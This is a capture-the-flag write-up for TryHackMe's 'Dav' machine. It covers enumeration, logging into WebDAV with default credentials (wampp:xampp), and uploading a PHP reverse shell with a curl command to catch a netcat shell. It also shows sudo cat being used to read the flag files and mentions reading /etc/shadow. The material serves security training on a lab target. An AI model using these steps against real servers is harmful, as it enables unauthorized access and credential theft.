Dav (THM)
TryHackMe – Dav Write-Up
topics: Web application security
Enumeration
Local Privilege Escalation (Exploitation)
Root Privilege Escalation
new tools: cadaver
tools: nmapAutomator, dirsearch, curl, kali webshells
Enumeration
Initial nmap scan ./nmapAutomator.sh $ip Basic
The only port that appears to be open is port 80 http. Lets run a vulnerability scan and dirsearch
./nmapAutomator $ip Vulns
python3 dirsearch.py -u $ip -e php,html,txt
There appears to be only one subdirectory /webdav. Attempting to navigate to this page as well as run dirsearch
or gobuster
against /webdav results in a 401 unauthorized access
Attempting to use the server version on searchsploit
yields nuanced exploits that would not be practical for this CTF challenge.
I attempted this exploit but did not realize it only worked with 201 code
This lead me to googling "webdav exploit" which proved useful as it revealed default creds wampp:xampp
Local Privilege Escalation
The passwd.dav file contains a hash that I was unable to crack, however, after more googling I discovered an interesting command cadaver
(a CLI WebDav client)
I then learned from this Null Byte article how to achieve a shell on a webdav server.
Exploit steps:
We will need a PHP shell, copy a default one from Kali to the /root directory
cp /usr/share/webshells/php/php-reverse-shell.php .
edit the IP to the attacker IP and desired port
Upload the reverse shell to the webdav server with curl (initially I tried to use
get
from the server CLI but if it is already on the Kali machine, you can useput
)curl http://10.10.66.11/webdav/shell.php -u wampp:xampp --upload-file php-reverse-shell.php
listen with
nc
on the portnavigate to the /webdav/shell.php and open the file
Root Privilege Escalation
First things first in Linux sudo -l
So our user has sudo privileges with cat. We can simply view the flags with
sudo cat /home/merlin/user.txt
sudo cat /root/root.txt
To get a reverse shell with a terminal with user or root privilege would be tricky. We can read the password file /etc/shadow and the sudoers file /etc/sudoers but we cant change users without a terminal even if we can crack the password. There is no other place to login as the user merlin or even send a shell back to us, as far as I can see at the moment. Maybe there is a kernel exploit we can use, I can always transfer LinPEAS
to enumerate. This will be a good post-exploitation exercise to return to.
This machine has the same kernel as Fowsniff, which used a kernel exploit to spawn a root shell, we can attempt to use this same exploit
Last updated